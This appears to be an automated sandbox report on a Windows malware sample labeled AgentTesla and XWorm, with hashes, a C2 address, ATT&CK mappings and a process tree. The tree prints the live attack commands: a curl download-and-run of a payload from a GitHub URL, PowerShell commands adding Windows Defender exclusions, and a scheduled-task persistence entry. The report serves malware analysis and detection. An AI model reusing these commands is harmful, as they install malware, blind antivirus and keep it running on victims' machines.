agenttesla | f6d30737ce669f8a1c075d6712309a9af6dd3bc5d6e3b5c6baf4f35c886a65bc

Analysis

max time kernel
71s
max time network
72s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
03-09-2024 20:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fix.exe
Size

73KB
MD5

b7b56d4bc5019b4b679714d2be92bfae
SHA1

2de2e4a0fcbca05d5e404458c5ee97e3ae446588
SHA256

2d10f1ac9b2e5ef7f246f35f39af12fa70054a8eaa7b7c200961241b49468dc5
SHA512

1802eb959489d01ed4c56c5ea1f7729432be21513c2cd4c141cf7491c9741158dc5095247a73c2023dae6b61a93c78d698a7a12f38a4b4004dfccedc7ac43ad3
SSDEEP

1536:wY/jBSSiM/oHseUtR0DVRfgeoOzIbKyLZhb1z0f:w+H1/1tRkWeoOovOf

Score

10^/10

agenttesla xworm discovery execution keylogger persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

C0re-51178.portmap.host:51178

Attributes

Install_directory
%Public%
install_file
svchost.exe

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000a000000023372-5.dat	family_xworm
behavioral2/memory/3736-9-0x0000000000520000-0x000000000053C000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral2/memory/4796-7-0x0000000008260000-0x0000000008474000-memory.dmp	family_agenttesla

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1872	powershell.exe
1020	powershell.exe
3348	powershell.exe
1228	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	fix.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	executor_API.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	executor_API.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	executor_API.exe

Executes dropped EXE 2 IoCs

pid	Process
3736	executor_API.exe
1948	svchost.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Public\\svchost.exe"	executor_API.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
18	raw.githubusercontent.com
19	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"	executor_API.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fix.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	fix.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	fix.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	fix.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4444	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3736	executor_API.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
3348	powershell.exe
3348	powershell.exe
1228	powershell.exe
1228	powershell.exe
1872	powershell.exe
1872	powershell.exe
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe
3736	executor_API.exe
3632	msedge.exe
3632	msedge.exe
4180	msedge.exe
4180	msedge.exe
1228	identity_helper.exe
1228	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
4180	msedge.exe
4180	msedge.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	3736	executor_API.exe
Token: SeDebugPrivilege	3348	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	3736	executor_API.exe
Token: SeDebugPrivilege	1948	svchost.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe
4180	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3736	executor_API.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4796 wrote to memory of 4180	4796	fix.exe	91
PID 4796 wrote to memory of 4180	4796	fix.exe	91
PID 4796 wrote to memory of 4180	4796	fix.exe	91
PID 4180 wrote to memory of 1540	4180	cmd.exe	93
PID 4180 wrote to memory of 1540	4180	cmd.exe	93
PID 4180 wrote to memory of 1540	4180	cmd.exe	93
PID 4796 wrote to memory of 3736	4796	fix.exe	96
PID 4796 wrote to memory of 3736	4796	fix.exe	96
PID 3736 wrote to memory of 3348	3736	executor_API.exe	98
PID 3736 wrote to memory of 3348	3736	executor_API.exe	98
PID 3736 wrote to memory of 1228	3736	executor_API.exe	100
PID 3736 wrote to memory of 1228	3736	executor_API.exe	100
PID 3736 wrote to memory of 1872	3736	executor_API.exe	102
PID 3736 wrote to memory of 1872	3736	executor_API.exe	102
PID 3736 wrote to memory of 1020	3736	executor_API.exe	104
PID 3736 wrote to memory of 1020	3736	executor_API.exe	104
PID 3736 wrote to memory of 4444	3736	executor_API.exe	108
PID 3736 wrote to memory of 4444	3736	executor_API.exe	108
PID 3736 wrote to memory of 4180	3736	executor_API.exe	114
PID 3736 wrote to memory of 4180	3736	executor_API.exe	114
PID 4180 wrote to memory of 3528	4180	msedge.exe	115
PID 4180 wrote to memory of 3528	4180	msedge.exe	115
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3244	4180	msedge.exe	116
PID 4180 wrote to memory of 3632	4180	msedge.exe	117
PID 4180 wrote to memory of 3632	4180	msedge.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\fix.exe
"C:\Users\Admin\AppData\Local\Temp\fix.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4796
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c curl -o %appdata%\executor_API.exe https://raw.githubusercontent.com/kokoska23/solara-remake-dependencies/main/update.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4180
- - C:\Windows\SysWOW64\curl.exe
    curl -o C:\Users\Admin\AppData\Roaming\executor_API.exe https://raw.githubusercontent.com/kokoska23/solara-remake-dependencies/main/update.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1540
- C:\Users\Admin\AppData\Roaming\executor_API.exe
  "C:\Users\Admin\AppData\Roaming\executor_API.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Sets desktop wallpaper using registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\executor_API.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'executor_API.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1020
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4444
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4180
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d32b46f8,0x7ff9d32b4708,0x7ff9d32b4718
      4⤵
      PID:3528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,125908604710327121,11012496097789196735,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
      4⤵
      PID:3244
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,125908604710327121,11012496097789196735,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,125908604710327121,11012496097789196735,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
      4⤵
      PID:860
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,125908604710327121,11012496097789196735,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
      4⤵
      PID:2544
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,125908604710327121,11012496097789196735,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
      4⤵
      PID:4236
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,125908604710327121,11012496097789196735,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
      4⤵
      PID:1020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,125908604710327121,11012496097789196735,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1228
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0mosbcct\0mosbcct.cmdline"
    3⤵
    PID:5088
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA50.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7AAA1037FDAC42D3A673B35748D7CCF4.TMP"
      4⤵
      PID:3780

C:\Users\Public\svchost.exe
C:\Users\Public\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3964

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2783c40400a8912a79cfd383da731086

SHA1
001a131fe399c30973089e18358818090ca81789

SHA256
331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

SHA512
b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ff63763eedb406987ced076e36ec9acf

SHA1
16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

SHA256
8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

SHA512
ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
604d3db645c6acbe8523ece15b78bda2

SHA1
c56fee16780646c1f998dd4fe86f9f8e9ccbde14

SHA256
eecdcc76dfe7ade7e04fbbecb898df44889d15d9ea23f212bd450e67decc861c

SHA512
d7fd68e8fcb5afa7c114bfd14e3cb4d3dbb89c33282136668b8bb224f789302559d33868abdd8cacca72faaa783f5a604a09343b97c083739229f45527347a0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c4e85bbb6c5c7ef48cd6ec40e49cf0fc

SHA1
b98cb39c285b4b14e08f3ffa1269c59c70434cde

SHA256
58151c88efe0f93abec999a195759c75213bb617554e503fc52de3a521e4adb5

SHA512
964a5fda721c89cd2d0b4915a7fe9ef60b3aaaa79f1111bb486534695d956e00ea851d0711248c3c5a68dd1dc0c26df0488fd38ed1c76cfe805073e3a9cb9f4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
2582f8598cd8b1a44c6c0fb95ac5c3f0

SHA1
0e69177678c428fac5db7327054667263969311c

SHA256
7363380dec425c6ea6ab4fafceca09aa17ce69e9dbfb6cbf6c7df392e52cf2dc

SHA512
0669cefac45c5329b329bc684956a095b16388c46986647d5c2909d480e7a6ba3608ecedaffd360fe4ac5774d02550d4982f2e84cdeb8a727661676c50cac2dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
740ce9dd7f928b1beec138f572d525f1

SHA1
f8b0d244ed294e18319e0bd6162e58e8c81c96d4

SHA256
c91450197f43f1d14ddafb75d053113e55586096f5c76cc6c3500f086f1c2701

SHA512
9224b1699db969a7c4fcd73039b5a3918544a56b2b9379892f4a87579051816ee89728f2d700ad680ecfdfcba0dcf3e5d439b53f65f17901e4eef0cdcad1772f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba5010b6182af8078e692373b459e395

SHA1
63b2b0c40d9a7c4ac69e71b216a8454d5f826a7e

SHA256
bf49d1b3c9709b8c1787d14697e94f19cc1483663d4d07027ff513e2384790a7

SHA512
e53a25fbbccda6e836c31acf2ad938f5ff1045c84853e6b0331be1390d72f87039a0aa16e7d6a5c2beb0388a40e0cb9431e51a1ed7fac67f21064b98fa078246

Download Submit
C:\Users\Admin\AppData\Local\Temp\0mosbcct\0mosbcct.0.vb

Filesize
386B

MD5
156a4b3e570d9c7efc0f0094dbceb24e

SHA1
ccd7e470b9114884d6e958ab4d8b4c451f493c66

SHA256
7443a1bcd15924a389e5da2a0530b6703a35aed61e63cd1a1d7d0699d49a5a77

SHA512
90123975819cc2fc3030f94cc8bfce587e8c7efcca8c7ac8a1e99c5f3211c0a50fe16994836fb46fcb3a68b2157259a59f7a5928c19bba2fc3cb4059ecc8efa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\0mosbcct\0mosbcct.cmdline

Filesize
313B

MD5
808afaed9de9489035e0ba234f94404d

SHA1
acffa6a2031335ac9c2613e2bdc15b28fffb8ac9

SHA256
04f4d2266b362ef8c8f5a6865dbbe931dc5f4d07be2fc6c89395b304c24fe8b3

SHA512
cc79e7157687684ab7f7c2b96140581a0291eba3d41b377fab66fb1decb06b3997b0bab2e166a4df3fe37c3c68d4775df38bbbe241303095f25df87b8de3357c

Download Submit
C:\Users\Admin\AppData\Local\Temp\0mosbcct\0mosbcct.exe

Filesize
6KB

MD5
28148ece361fafe2c79d98225c803165

SHA1
a37d9f2ba4fd12531afba5f9bce8b1d80ea1cd0c

SHA256
c35283c03da8e045ec82aa4f1aca57837191a4bf717dd0908bdd1e00b8d6860b

SHA512
ece853fd13485fe82382fda7d7aebd5918be81ad07f112cd9c6dd7f8e99785af353736ef0b45c2f5e55122bf099d2ba8d847ba9624e4bf1fe6218cd0f6486ce9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCA50.tmp

Filesize
1KB

MD5
6324247a7622fc5f6520cdeacb5cd4b8

SHA1
143560895c3562e8a0928a27dba46f86d3591699

SHA256
0a4d74c6f360865656c6f6dcb6094c68d7d15d43f14529d9b479824af83d9781

SHA512
ac6b6703e242dbee7864350dde3d2ce4bc56bbc9c456d41059ddf53ba70c9c2de991427dd4f0a130efda11307568155560120bb145f34db84fc31a45d20f2e0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xptohaq3.oa0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vbc7AAA1037FDAC42D3A673B35748D7CCF4.TMP

Filesize
1KB

MD5
a28799c2a79f14284b80d6d22035ef97

SHA1
4cc5747a7d455294a6f2c30f3ff481d65e3bdcdf

SHA256
f653df03e50d24913fe0b21a0f251a11eda64c789c3424d518bf32d138659c57

SHA512
